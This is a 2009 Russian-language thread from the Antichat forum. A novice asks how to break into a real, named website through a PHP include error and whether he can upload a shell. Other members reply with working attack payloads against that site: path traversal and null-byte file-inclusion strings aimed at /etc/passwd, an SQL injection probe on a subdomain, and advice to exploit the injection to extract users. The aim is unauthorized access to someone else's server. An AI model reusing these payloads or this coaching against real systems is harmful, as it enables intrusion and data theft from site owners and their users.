Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   первый взлом? (https://forum.antichat.xyz/showthread.php?t=121218)

mss-s 18.05.2009 17:53

первый взлом?
 
есть сайт, есть ошибка

PHP код:

Fatal error: require() [function.require]: Failed opening required 'articles/phpinfo/text.htm' (include_path='.:/usr/local/share/pear'in /pub/home/teplotex/htdocs/fedorov/site/index.php on line 115 

вот вопросы

как я понимаю это пхп инклуд ?
возможно залить шелл?
поскольку это моя первая попытка взломать сайт, то что нужно предпринять в первую очереди перед взломом ?

diznt 18.05.2009 17:59

Цитата:

то что нужно предпринять в первую очереди перед взломом ?
читать статьи бля

что за линк? так просто не скажешь

fl00der 18.05.2009 18:00

Пока токо раскрытие путей

Qwazar 18.05.2009 18:03

Какой запрос шлёшь то?

mss-s 18.05.2009 19:20

index.php?id=blabla

m0Hze 18.05.2009 19:38

это не инклуд

mss-s 18.05.2009 19:39

http://www.warlib.ru/index.php?id=phpinfo

D1mOn 18.05.2009 19:48

Там код такой
Цитата:

require("articles/".$id."/text.html");
Врядли что заинклюдится мне кажется.

kyzmi4 18.05.2009 21:10

первым делом надо одень презерватив на свой компьютер =\

ReduKToR 18.05.2009 21:14

kyzmi4,или носки......на кройняк ВПН

http://top.warlib.ru/index.php?cid=11'
дальше сам ???

ReduKToR 18.05.2009 21:19

чо молчите? все ломают?
кто шелл зальет скажите...самому времени нет

eLWAux 18.05.2009 22:42

http://www.warlib.ru/index.php?id=phpinfo
Failed opening required 'articles/phpinfo/text.htm

PHP код:

.. require('articles/'.$_GET['id'].'/text.html'); .. 

максимум - локальная читалка

пробуй:
/index.php?id=/etc/passwd%00

Qwazar 18.05.2009 23:05

Цитата:

Сообщение от eLWAux
http://www.warlib.ru/index.php?id=phpinfo
Failed opening required 'articles/phpinfo/text.htm

PHP код:

.. require('articles/'.$_GET['id'].'/text.html'); .. 

максимум - локальная читалка

пробуй:
/index.php?id=/etc/passwd%00

Не совсем так, пробуй: /index.php?id=../../../../../../../../../../etc/passwd%00

попугай 18.05.2009 23:22

там магик квотес включены

Qwazar 18.05.2009 23:28

Тогда отсекать как написано тут (я на серв не заходил): https://forum.antichat.ru/thread98525.html

ReduKToR 19.05.2009 07:06

ракручивай скулю что на первой странице дал....узнавай ветку....выводи юзеров


Время: 22:49